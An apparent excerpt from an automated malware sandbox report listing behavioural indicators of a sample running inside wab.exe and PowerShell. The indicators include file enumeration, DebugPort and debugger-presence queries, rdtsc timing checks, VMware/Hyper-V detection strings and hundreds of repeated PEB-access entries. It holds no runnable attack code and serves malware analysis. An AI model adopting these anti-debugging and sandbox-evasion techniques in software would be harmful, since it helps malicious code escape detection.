              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 2804 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_23D710F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00418981 memset,GetSystemInfo,17_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(R8)
              Source: wscript.exe, 0000000F.00000003.2253570420.0000000004C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.2490651768.0000020B74B9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_18-33817
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\relog.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD1C0 rdtsc 26_2_21CFD1C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_045DD6E0 LdrInitializeThunk,5_2_045DD6E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_23D72639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,17_2_004044A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D74AB4 mov eax, dword ptr fs:[00000030h]10_2_23D74AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D461C3 mov eax, dword ptr fs:[00000030h]26_2_21D461C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D461C3 mov eax, dword ptr fs:[00000030h]26_2_21D461C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBD1D0 mov eax, dword ptr fs:[00000030h]26_2_21CBD1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBD1D0 mov ecx, dword ptr fs:[00000030h]26_2_21CBD1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D551CB mov eax, dword ptr fs:[00000030h]26_2_21D551CB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]26_2_21CFE1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]26_2_21CFE1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFE1D0 mov ecx, dword ptr fs:[00000030h]26_2_21CFE1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]26_2_21CFE1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]26_2_21CFE1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]26_2_21CA51EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C851ED mov eax, dword ptr fs:[00000030h]26_2_21C851ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D271F9 mov esi, dword ptr fs:[00000030h]26_2_21D271F9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D561E5 mov eax, dword ptr fs:[00000030h]26_2_21D561E5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB01F8 mov eax, dword ptr fs:[00000030h]26_2_21CB01F8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC0185 mov eax, dword ptr fs:[00000030h]26_2_21CC0185
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]26_2_21D0019F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]26_2_21D0019F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]26_2_21D0019F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]26_2_21D0019F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7A197 mov eax, dword ptr fs:[00000030h]26_2_21C7A197
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7A197 mov eax, dword ptr fs:[00000030h]26_2_21C7A197
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7A197 mov eax, dword ptr fs:[00000030h]26_2_21C7A197
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3C188 mov eax, dword ptr fs:[00000030h]26_2_21D3C188
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3C188 mov eax, dword ptr fs:[00000030h]26_2_21D3C188
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CD7190 mov eax, dword ptr fs:[00000030h]26_2_21CD7190
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]26_2_21D311A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]26_2_21D311A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]26_2_21D311A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]26_2_21D311A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9B1B0 mov eax, dword ptr fs:[00000030h]26_2_21C9B1B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55152 mov eax, dword ptr fs:[00000030h]26_2_21D55152
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D18158 mov eax, dword ptr fs:[00000030h]26_2_21D18158
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]26_2_21C79148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]26_2_21C79148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]26_2_21C79148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]26_2_21C79148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7C156 mov eax, dword ptr fs:[00000030h]26_2_21C7C156
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C87152 mov eax, dword ptr fs:[00000030h]26_2_21C87152
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C86154 mov eax, dword ptr fs:[00000030h]26_2_21C86154
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C86154 mov eax, dword ptr fs:[00000030h]26_2_21C86154
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D19179 mov eax, dword ptr fs:[00000030h]26_2_21D19179
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D40115 mov eax, dword ptr fs:[00000030h]26_2_21D40115
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2A118 mov ecx, dword ptr fs:[00000030h]26_2_21D2A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]26_2_21D2A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]26_2_21D2A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]26_2_21D2A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB0124 mov eax, dword ptr fs:[00000030h]26_2_21CB0124
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]26_2_21C7B136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]26_2_21C7B136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]26_2_21C7B136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]26_2_21C7B136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D550D9 mov eax, dword ptr fs:[00000030h]26_2_21D550D9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D020DE mov eax, dword ptr fs:[00000030h]26_2_21D020DE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD0C0 mov eax, dword ptr fs:[00000030h]26_2_21CFD0C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD0C0 mov eax, dword ptr fs:[00000030h]26_2_21CFD0C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA90DB mov eax, dword ptr fs:[00000030h]26_2_21CA90DB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C880E9 mov eax, dword ptr fs:[00000030h]26_2_21C880E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7A0E3 mov ecx, dword ptr fs:[00000030h]26_2_21C7A0E3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA50E4 mov eax, dword ptr fs:[00000030h]26_2_21CA50E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA50E4 mov ecx, dword ptr fs:[00000030h]26_2_21CA50E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D060E0 mov eax, dword ptr fs:[00000030h]26_2_21D060E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7C0F0 mov eax, dword ptr fs:[00000030h]26_2_21C7C0F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC20F0 mov ecx, dword ptr fs:[00000030h]26_2_21CC20F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8208A mov eax, dword ptr fs:[00000030h]26_2_21C8208A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7D08D mov eax, dword ptr fs:[00000030h]26_2_21C7D08D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0D080 mov eax, dword ptr fs:[00000030h]26_2_21D0D080
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0D080 mov eax, dword ptr fs:[00000030h]26_2_21D0D080
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB909C mov eax, dword ptr fs:[00000030h]26_2_21CB909C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAD090 mov eax, dword ptr fs:[00000030h]26_2_21CAD090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAD090 mov eax, dword ptr fs:[00000030h]26_2_21CAD090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C85096 mov eax, dword ptr fs:[00000030h]26_2_21C85096
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D460B8 mov eax, dword ptr fs:[00000030h]26_2_21D460B8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D460B8 mov ecx, dword ptr fs:[00000030h]26_2_21D460B8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D180A8 mov eax, dword ptr fs:[00000030h]26_2_21D180A8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D06050 mov eax, dword ptr fs:[00000030h]26_2_21D06050
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C82050 mov eax, dword ptr fs:[00000030h]26_2_21C82050
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB052 mov eax, dword ptr fs:[00000030h]26_2_21CAB052
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55060 mov eax, dword ptr fs:[00000030h]26_2_21D55060
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAC073 mov eax, dword ptr fs:[00000030h]26_2_21CAC073
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0106E mov eax, dword ptr fs:[00000030h]26_2_21D0106E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD070 mov ecx, dword ptr fs:[00000030h]26_2_21CFD070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]26_2_21C9E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]26_2_21C9E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]26_2_21C9E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]26_2_21C9E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7A020 mov eax, dword ptr fs:[00000030h]26_2_21C7A020
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7C020 mov eax, dword ptr fs:[00000030h]26_2_21C7C020
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]26_2_21D4903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]26_2_21D4903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]26_2_21D4903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]26_2_21D4903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3B3D0 mov ecx, dword ptr fs:[00000030h]26_2_21D3B3D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]26_2_21C883C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]26_2_21C883C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]26_2_21C883C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]26_2_21C883C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D063C0 mov eax, dword ptr fs:[00000030h]26_2_21D063C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3C3CD mov eax, dword ptr fs:[00000030h]26_2_21D3C3CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D553FC mov eax, dword ptr fs:[00000030h]26_2_21D553FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB63FF mov eax, dword ptr fs:[00000030h]26_2_21CB63FF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]26_2_21C9E3F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]26_2_21C9E3F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]26_2_21C9E3F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA438F mov eax, dword ptr fs:[00000030h]26_2_21CA438F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA438F mov eax, dword ptr fs:[00000030h]26_2_21CA438F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]26_2_21C7E388
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]26_2_21C7E388
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]26_2_21C7E388
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]26_2_21C78397
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]26_2_21C78397
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]26_2_21C78397
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CD739A mov eax, dword ptr fs:[00000030h]26_2_21CD739A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CD739A mov eax, dword ptr fs:[00000030h]26_2_21CD739A
